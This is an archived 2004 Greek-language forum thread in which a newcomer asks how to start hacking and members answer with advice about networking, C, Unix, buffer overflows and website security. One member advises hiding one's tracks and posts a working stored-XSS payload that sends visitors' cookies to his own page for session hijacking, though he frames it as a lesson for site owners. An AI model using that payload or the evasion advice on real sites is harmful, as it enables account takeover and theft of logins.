tsotrilos Δημοσ. 26 Μαρτίου 2004 Δημοσ. 26 Μαρτίου 2004 yparxei kaneis pou exei PRAGMATIKH oreksh na odhghsei kapoion sta prwta bhmata tou hacking?
redxaris Δημοσ. 26 Μαρτίου 2004 Δημοσ. 26 Μαρτίου 2004 to hacking einai terastia enia....einai mia lexsei me xilies erminies....etsi pistevw egw toulaxiston..esena ti se endiaferei akrivws na matheis?????
tsotrilos Δημοσ. 26 Μαρτίου 2004 Μέλος Δημοσ. 26 Μαρτίου 2004 βασικα με γοητευε παντα η αισθηση του οτι υπερβαινω τα στανταρ πραγματα...παντα εψαχνα αυτο το κατι παραπανω απο ενα απλο πειραγμα στο pc η ενα απλο σερφασισμα στο δικτυο.πιο παλια μαλιστα ειχα κανει καποια βηματα...ειχα βρει προγραμματα: να βρησκουν Ι.Ρ να βρησκουν ανοιχτο port και γενικα πολλα πραγματα διαφορα... ειχα μιλησει με ατομα αλλα σιγα σιγα ειδα πως δεν βοηθουσε κανεις. το να μπω σε εναν αλλο υπολογιστη ειναι αυτο που θελω και οχι απλα για να κανω κατι κακο...οχι για αυτο μα μονο για να αποκτησωτην γνωση για να μπορω να προστατευομαι καλυτερα...γιατι οταν ξερεις τα πραγματα απο μεσα ειναι αλλιως... δεν ξερω αν γινομαι κατανοητος
alfas Δημοσ. 26 Μαρτίου 2004 Δημοσ. 26 Μαρτίου 2004 oraia 8es na sou doso mia basi....??? Katarxas prepei na xereis ti simainei o oros hackin....ok? Giati opos 8a simfonisoun oloi oi pio polloi apo emas....to exoun karamela...eno stin ousia einai lemeria tou kerata....den einai hacking na breis tin ip....enos i mia anoixti port!!!Kai bebaia oute einai anagki na breis programmata gia na kaneis kati tetoio mesa apo to dos ginontai...kai malista poli apla.... To 8ema einai oti o ka8enas leei "poooooooo mpika stou tetoiou to PC kai ekana kai erana" kai stin ousia an exei mpei exei mpei me kapoia programmata pou brike idi etoima....kai ti exeis kataferei???Tipota..?Stin ousia xereis ti kaneis.>>?? Koroideueis ton eauto sou... An 8eleis na ma8eis den 8a les 8elo na ma8o na hackaro i na kliso to pc tou allou i na paro tous kodikous tou!!!i otidipote allo.... Tls fliaro tosi ora,....eno esi 8eleis na ma8eis.... Opote 8a sou protino kapoia pragmatakia an se endiaferei na ma8eis kati kai as min gineis pote Kevin!!(Ali8eia xereis pios einai o Kevin?) Katse kai ma8e oso mporeis..... Diktia(oxi pos na ta stineis ) alla pos douleeuoun!!8a mou peis tora re filaraki ti me endiaferei to diktio,ego 8elo na mpo sto PC sou kai na to xekoliaso!! e? Omos an skefteis oti osoi eimaste sto NET eimaste ena pagkosmio diktio!!tote 8a katalabeis.... Afou siniditopoiiseis ti einai ta diktia...kai pareis ere8ismata... xekina siga siga na asxoleisai me kapoia glossa...polloi lene i C oti einai idaniki alla einai kai mpelalidiki(etsi pisteuo ego-isos epeidi den tin piga pote mou ) Kai argotera afou exeis dei ti paizei genikos....katse na asxoli8eis kai me opensource..........blepe linux-unix!!!!! Pantos oso pio mikros eisai toso pio,....pos na to po....toso pio omorfa fainontai ola...auta!!!! Gia auto an 8es na asxoli8eis skepsou to...giati 8elei xrono kai kopo(orismenes fores poli perissotero apo oti 8a afieroseis se gkomenes ) Ta matia sou 8a sou ginoun etsi episis polles fores!!! KAI ta @@ den mporo na fantasto 8a bgoun apo ta peri8oria tis o8onis sou.... An meta apo ola auta peis olo malakies leei o tipos...tote file mou!!! Psaxe sto internet gia tin pli8ora etimon utilities kai "prouf" ta paparia tou ka8enos
baxter Δημοσ. 26 Μαρτίου 2004 Δημοσ. 26 Μαρτίου 2004 wraios o alfas file alfa, se genikes grammes kala ta eipes... omws mi to apoperneis to paidi.. stin ousia den yparhei anthrwpos pou na asholeitai kapws vathitera me tous ypologistes kai na min ehei paixei me tetoiou eidous programmatakia.. giati stin ousia gia paihnidia prokeitai! oso gia sena file tsotrilo, opws eipe kai o alfas 2 einai oi lexeis kleidia : programmatismos kai unix programmatismos giati dimiourgeis kai oso dimiourgeis theleis na matheis akoma perissotera kai na dimiourgiseis akoma perissotera.. kai unix giati erhesai pio koda sto systima kai den ta vriskeis ola etoima.. opws eipe kai o alfas psaxe sto internet... ohi omws gia sites pou sou lene pws na beis se ena systima, alla gia sites pou sou lene pws na asfaliseis ena systima... afta einai ta axiologa... > while (1) { psaxe(); diavase(); peiramatisou(); }
tsotrilos Δημοσ. 27 Μαρτίου 2004 Μέλος Δημοσ. 27 Μαρτίου 2004 den exw para na symfwnhsw me esas... dystyxws kapoia apo ta pragmata pou eipe kai o alfa alla kai esy baxter den ta eixa sto myalo...alloste an ta eixa sto myalo mou den 8a ekana ton kopo na mpw kai na rwthsw sto insomnia kati tetoio. ontws opws to fantasthka den einai ka8olou eykolokati tetoio...(hacking-cracking...) apla eixa thn aporia-kollhma... pantws eilikrina eyxaristw olous sas
alfas Δημοσ. 27 Μαρτίου 2004 Δημοσ. 27 Μαρτίου 2004 Tsotrile...basika auta pou sou eipa den ta eipa gia na se apotrpso me to na asxoli8eis me to antikeimeno tis pliroforikis...apla i8ela na sou po oti den einai toso eukolo....! Alla xereis kati den einai akator8oto.. Keep walking
tsotrilos Δημοσ. 28 Μαρτίου 2004 Μέλος Δημοσ. 28 Μαρτίου 2004 ennoeite...den prokeite na to afhsw apo thn stigmh pou me gohteyei toso... 8a to psaxw!!!!
tzoykas Δημοσ. 28 Μαρτίου 2004 Δημοσ. 28 Μαρτίου 2004 pallhkari mou tsotrilos einai san na zhtas apo kapoion na sou ma9ei pws 9a gineis odhgos Formula 1 ...... einai toso polupleuro kai axanes 9ema pou de nomizw kanenas edw na exei to xrono (kai thn ore3h) na sou ma9ei kati. Allwste se gohteuei to angwsto alla mporei kai na mh se gohteusei ka9olou h ousia tou pragmatos, pou allwste einai diaforetikh gia ton ka9ena Filika
calculator Δημοσ. 28 Μαρτίου 2004 Δημοσ. 28 Μαρτίου 2004 Φίλε θα σου πω κι εγώ την άποψή μου: 1) Hacking υψηλού επιπέδου μάλλον είναι δύσκολο να καταφέρεις να κάνεις αν δεν έχεις ασχοληθεί με υπολογιστές πολύ καιρό. Απαιτεί πολύ ειδικές γνώσεις και πολύπλευρες, γνώσεις που και πολλοί που ασχολούνται δεν τις έχουν. 2) Μπορείς όμως κάποιος που έχει γνώσεις να κάνει ενός επιπέδου hacking σχετικά απλά. Αυτό γίνεται ως εξής: α) Μελετάς το σύστημα που θέλεις να σπάσεις β) Βρίσκεις τις πιθανές αδυναμίες του, τις τρύπες δηλαδή, 3) Επιτίθεσαι στις τρύπες αυτές με κάποιους τρόπους που σίγουρα περιλαμβάνουν προγραμματισμό ή γνώσεις προγραμματισμού. 3) Μάθε πως να μην αφήνεις ίχνη, τουλάχιστον πως να μην εντοπίζεσαι. Μπορεί να βρουν τι έκανες (αυτό δεν είναι πάντα εύκολο να το αποφύγεις) αλλά τουλάχιστον να μην μπορούν να βρουν ποιος είσαι. Πολύ σημαντικό και αυτό. 4) Οι τρύπες υπάρχουν παντού. Νομίζουν κάποιοι ότι με firewalls, IDS systems, κτλ γλιτώνουν. Μα πως να γλιτώσουν όταν οι εφαρμογές τους λένε μόνες τους "κάνε μου hacking"? Σε προκαλούν να το κάνεις, καλό τους κάνεις να μαθαίνουν και να προσαρμόζονται. Οι μεγάλες τρύπες είναι εκεί που παρεμβαίνει ο προγραμματιστής, εκεί που τα κάνει θάλασσα επειδή δεν ξέρει και δεν έχει την εμπειρία να προφυλάξει το σύστημά του. Σε επίπεδο λειτουργικού τα πράγματα είναι πολύ δυσκολότερα και εκεί αναλαμβάνουν ειδικές ομάδες, επί πληρωμή βέβαια, να βρουν τρύπες, είναι πολύ δύσκολο για κοινό θνητό να το κάνει. 5) Για πρώτη προσπάθεια προσπάθησε να κάνεις κάτι εύκολο. Π.χ. ψάξε στο Internet για Javascript injection. Με αυτό τον τρόπο π.χ. μπορείς να υποκλέψεις passwords (λέμε τώρα - εγώ δεν είπα τίποτα). Απαιτεί λίγο προγραμματισμό και πολλά sites έχουν τέτοια τρύπα. 6) Θα ήθελα να πω κάτι και ας μη με παρεξηγήσουν πολλοί. Στην Ελλάδα τα πράγματα σε επίπεδο προστασίας είναι πολύ πίσω. Υπάρχουν δεκάδες τρύπες σε πολλά sites, σχεδόν ξέφραγο αμπέλι είμαστε. Ακόμα και τράπεζες έχουν τρύπες (κάποτε είχα βρει τον κωδικό του admin στην βάση δεδομένων μιας πολύ γνωστής Ελληνικής τράπεζας - τους είπα πως και καραφλιάσανε - απλά ήταν άσχετοι). Αν είμασταν Αμερική όλα θα είχαν διαλυθεί, εκεί υπάρχουν hackers που θα τα κάνανε όλα ρημαδιό. Ευτυχώς είμαστε Ελλάδα. Ίσως αυτά που είπα να τα έβγαλα σαν ιστορία από το μυαλό μου πάντως. Μην βασίζεσαι σε μένα, είμαι σχεδόν άσχετος.
calculator Δημοσ. 28 Μαρτίου 2004 Δημοσ. 28 Μαρτίου 2004 Να σου κάνω μια εισαγωγή με πολύ απλά λόγια στο advanced hacking έτσι για να ξέρεις: Το μεγαλύτερο πρόβλημα που έχουν οι διάφορες εφαρμογές που έχουν φτιαχθεί από σοβαρούς προγραμματιστές ενός κάποιου επιπέδου (γιατί άλλες που δεν έχουν φτιαχθεί από τέτοιους έχουν 100άδες προβλήματα) ονομάζεται buffer overflow. Τι είναι αυτό; Όταν θέλουμε να αποθηκεύσουμε προγραμματιστικά κάποια πράγματα στη μνήμη του υπολογιστή, χρησιμοποιούμε κάποιες περιοχές μνήμης που τις δεσμεύουμε από το λειτουργικό σύστημα (που διαχειρίζεται όλη τη μνήμη). Κάθε περιοχή που δεσμεύουμε ονομάζεται buffer. Έστω τώρα ότι θέλουμε να δεσμεύσουμε ένα χώρο στη μνήμη για να αποθηκεύσουμε κάποια πράγματα που ένας χρήστης της εφαρμογής μας εισάγει. Θα πρέπει να καθορίσουμε το μέγιστο μέγεθος μνήμης που δεσμεύουμε και ας δεχθούμε ότι αυτό είναι π.χ. 2KB (2048 bytes). Αν τώρα ο χρήστης εισάγει κάτι μεγαλύτερο από 2K θα πρέπει να το αντιληφθούμε και με τον κατάλληλο τρόπο να το αντιμετωπίσουμε (π.χ. με μήνυμα, με κάποιο error, κτλ). Αν όμως η εφαρμογή μας δεν έχει φτιαχθεί σωστά, είναι πιθανό να μην έχουμε βάλει τον κατάλληλο έλεγχο και να πάμε να γράψουμε στη μνήμη την πληροφορία που είναι μεγαλύτερη από τα 2Κ που έχουμε δεσμεύσει. Κάτι τέτοιο οδηγεί σε γράψιμο σε περιοχή της μνήμης που δεν μας επιτρέπεται (και πιθανά ανήκει σε άλλη εφαρμογή) και έχει ως αποτέλεσμα κάτι που αναφέρεται ως crash. Αν τώρα κάποιος καταλάβει ότι κάτι τέτοιο συμβαίνει, μπορεί να φτιάξει ένα προγραμματάκι το οποίο: 1) Αφενός μεν θα στείλει στην εφαρμογή μας και στο προβληματικό σημείο κάτι μεγαλύτερο από 2Κ για να την κρασάρει 2) Αφετέρου δε και επειδή έχει κρασάρει (έχει σταματήσει η εκτέλεσή της σε κάποιο σημείο δηλαδή), μπορεί να στείλει και επιπλέον κώδικα με τον οποίο θα κάνει διάφορα πράγματα στον υπολογιστή που έτρεχε η εφαρμογή. Είναι αυτό που βλέπεις συνήθως στα critical patches της Microsoft ότι μπορεί κάποιος να εκτελέσει στον υπολογιστή σου εντολές χωρίς να πρέπει. Αυτό κάνουν οι hackers: κρασάρουν κάποια εφαρμογή και πλέον μπορούν να εκτελούν από εκεί που σταμάτησε δικές τους εντολές. Τώρα το πόσο είναι εύκολο να βρεις ποια προγράμματα έχουν τέτοιες τρύπες και που, γνώμη μου είναι ότι είναι πολύ δύσκολο. Απαιτεί βαθιές γνώσεις και ομάδες προγραμματιστών με ειδίκευση σε θέματα ασφαλείας. Υπάρχουν πολλοί οργανισμοί που βρίσκουν τέτοιες τρύπες και τις δημοσιεύουν ώστε να βγει το κατάλληλο patch που τις διορθώνει (και το οποίο βγαίνει σε 1-2 ημέρες). Πολύ σημαντικό είναι αν έχεις πρόσβαση στον πηγαίο κώδικα της εφαρμογής. Κάτι τέτοιο είναι δύσκολο αλλά π.χ. πρν λίγες μέρες διέρρευσε κώδικας του Internet Explorer (τριετίας), ο οποίος πιθανά να μην έχει αλλάξει ακόμα σε μερικά σημεία και επομένως κάποιος που τον βλέπει και ψάχνει μπορεί να βρει σημεία του που είναι ευαίσθητα σε buffer overflow και να αρχίσει να επιτίθεται. Κάποιες άλλες παρατηρήσεις: 1) Hacking Μπορείς να κάνεις είτε έχεις Windows, είτε Linux. Όσοι μιλάνε για Linux μόνο απλά δεν ξέρουν τίποτα, έχουν ακούσει διάφορες ιστορίες από το Internet, βλέπουν το Linux σαν κάτι που μόνο guru και computer freaks μπορούν να το χρησιμοποιήσουν και νομίζουν ότι μόνο εκεί γίνεται. Όχι, παντού γίνεται, απλά γιατί τα ίδια προγράμματα μπορείς να τα φτιάξεις σε όλα τα λειτουργικά. 2) Υπάρχει η εντύπωση ότι το Linux είναι ασφαλέστερο λειτουργικό και πιθανά να είναι. Και αυτό στηρίζεται στην άποψη ότι επειδή είναι ανοικτός ο κώδικάς του, τα προβλήματα ασφαλείας εντοπίζονται γρήγορα και διορθώνονται. Βέβαια από την άλλη υπάρχει η άποψη του ότι ο ανοικτός κώδικας είναι ανοικτός σε όλους (και επομένως και στους hackers) και έτσι τους δίνεις πάτημα να βρουν και να κάνουν αυτό που τους αρέσει. Ταυτόχρονα τα λειτουργικά Microsoft αποτελούν το 95% των στόχων και επομένως είναι λογικό να βρίσκονται εκεί τα περισσότερα προβλήματα ασφαλείας. 3) Γλώσσα προγραμματισμού για hackers είναι η C. Και αυτό γιατί δίνει μεγαλύτερες δυνατότητες σε low level προγραμματισμό. Αυτό βέβαια δεν σημαίνει ότι δεν μπορείς να χρησιμοποιήσεις άλλες γλώσσες (π.χ. VB). Απλά θα κουραστείς περισσότερο για το ίδιο πράγμα. Σε επόμενο post και εφόσον υπάρχει ενδιαφέρων θα κάνω μια σύντομη αναφορά για το πως προστατεύουμε υπολογιστικά συστήματα από επιθέσεις.
NeTd4mN Δημοσ. 29 Μαρτίου 2004 Δημοσ. 29 Μαρτίου 2004 Symfonw me tous alfa kai calculator, kapoios pou thelei na asxolithei tha prepei na diavasei gia diktya kai programatismo kai o calculator ta exhgei poly kala. Einai apo ta liga posts me tetoio thema pou den synexistikan me flame, egw tha ithela na to synexiseis calculator.
calculator Δημοσ. 29 Μαρτίου 2004 Δημοσ. 29 Μαρτίου 2004 Αν και δεν είναι ο κατάλληλος χώρος για μαθήματα hacking (με την καλή έννοια του όρου), θα προσπαθήσω να σας δείξω μερικά πραγματικά παραδείγματα ώστε όσοι έχετε κάποιο website να μπορείτε να το προφυλάξετε ως ένα βαθμό. Πάντα βέβαια θα υπάρχουν κίνδυνοι αλλά ας δούμε τι μπορείτε να κοιτάτε σε πρώτο στάδιο ώστε να προλαμβάνετε άσχημες καταστάσεις. Όσα θα αναφέρω εδώ είναι απλά αλλά όχι "ακίνδυνα". Πολλά sites είναι ευάλωτα σε τέτοιες μικρές ( τρύπες, ακόμα και sites που νομίζετε ότι τα έχουν κάνει επαγγελματίες και εταιρείες σοβαρές. Δυστυχώς πολλοί λίγοι στην Ελλάδα ξέρουν μερικά πράγματα και λίγοι ψάχνονται. Οι περισσότεροι αντιμετωπίζουν επιφανειακά τα πράγματα και κυρίως η έλλειψη χρημάτων το πρώτο πράγμα που κόβει (και αυτό είναι πολύ κακό) είναι το budget για ασφάλεια. Σκοπός των όσων θα αναφέρω είναι: 1) Να έρθουν σε επαφή προγραμματιστές που δεν έχουν ποτέ ασχοληθεί με θέματα ασφάλειας, με μερικές απλές τρύπες συστημάτων 2) Να κατανοήσουν απλοί χρήστες γιατί δεν τους επιτρέπετε μερικές φορές να κάνουν συγκεκριμένες ενέργειες 3) και τέλος να ικανοποιηθεί ως ένα βαθμό η περιέργεια μερικών Για να καταλάβει κάποιος τι λέω θα πρέπει να έχει κάποιες βασικές γνώσεις προγραμματισμού (Javascript, SQL, server side programming, HTML, κτλ). Χρήστες που δεν έχουν τέτοιες γνώσεις μπορούν να αντιληφθούν κάποια πράγματα, δεν μπορούν όμως να τα καταλάβουν πραγματικά. Η αναφορά θα γίνει σε 3 μέρη: 1. Javascript injection - τρύπα 1η 2. SQL injection - τρύπα 2η 3. Πραγματικό παράδειγμα Δεν ξέρω αν υπάρχει παρόμοιο post σε άλλο site στην Ελλάδα. Συνήθως τέτοια πληροφορία την βρίσκουμε σε ξένα sites που εκεί η ασφάλεια αντιμετωπίζεται σαν το σημαντικότερο μέλημα.
calculator Δημοσ. 29 Μαρτίου 2004 Δημοσ. 29 Μαρτίου 2004 Javascript injection - τρύπα 1η Η τρύπα αυτή έχει να κάνει με την προσθήκη Javascript κώδικα μέσα σε μια σελίδα που εκτελείται δυναμικά. Για παράδειγμα ας θεωρήσουμε ένα forum όπως αυτό εδώ, που μας δίνει τη δυνατότητα να κάνουμε post μηνύματα. Κάθε μήνυμα που γράφουμε αποθηκεύετε σε μια βάση δεδομένων και υπάρχει μια σελίδα που εκτελείται δυναμικά στο server, φορτώνει τα μηνύματα από τη βάση και κατασκευάζει ως αποτέλεσμα μια άλλη HTML σελίδα που περιλαμβάνει τα μηνύματα για να τα δει ο χρήστης. Αν τώρα υπάρχει η δυνατότητα να χρησιμοποιήσω HTML μέσα στην περιγραφή του μηνύματός μου, μπορώ να κάνω τα εξής: 1. Κάπου, σε κάποιο άλλο δικό μου site, φτιάχνω μια άλλη σελίδα που παίρνει από το querystring πληροφορία και την καταχωρεί σε μια δική μου βάση. Το querystring είναι αυτό που εμφανίζεται στη διεύθυνση και μετά τον χαρακτήρα ?. Το querystring έχει τη μορφή var1=a&var2=b&var=c... Τη σελίδα αυτή την λέω Save2DB.asp και καλείται ως εξής: http://www.mysite.com/Save2DB.asp?str=Info Ότι περνάει στη σελίδα μέσω της μεταβλητής str (στο πάνω παράδειγμα είναι η λέξη Info) καταχωρείται στη βάση μου. Πάω τώρα στο πρώτο site που έχει το forum και κάνω post ένα μήνυμα. Το μήνυμα είναι το εξής: ><SCRIPT>XSSImage = new Image;XSSImage.src = 'http://www.mysite.com/Save2DB.asp?str=' + document.cookie;</SCRIPT> This is my message Έστω τώρα ότι το forum είναι κακογραμμένο και ότι του βάζω το δείχνει. Δεν αφαιρεί δηλαδή κώδικα HTML και πολύ δε παραπάνω script κώδικα. Ότι βρίσκεται ανάμεσα από <script> και </script> δεν θα φανεί φυσικά αλλά θα εκτελεσθεί. Όποιος επισκέπτεται τώρα τη σελίδα του forum με τα μηνύματα θα βλέπει και το δικό μου. Το δικό μου όμως μήνυμα εκτελεί και ένα script. Έτσι από κάτω, θα στέλνεται η πληροφορία που περιέχεται στο cookie σε μένα. Τι μπορεί να έχει το cookie; Όπως θα γνωρίζετε, πολλές φορές σε login φόρμες σας ζητείτε να αποθηκεύσετε την πληροφορία ώστε να μην χρειάζετε συνεχώς να δίνετε username & password. Αυτή η πληροφορία σώζεται σε ένα cookie. Αν τώρα εγώ πάρω με τον τρόπο που ανέφερα το δικό σας cookie, πολύ απλά μπορώ να το χρησιμοποιήσω και να προσποιηθώ στο site ότι είμαι εσείς. Και ας πούμε μικρό το κακό. Αν πάρω όμως το cookie του administrator; Τότε καταλαβαίνετε τι μπορεί να γίνει...
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.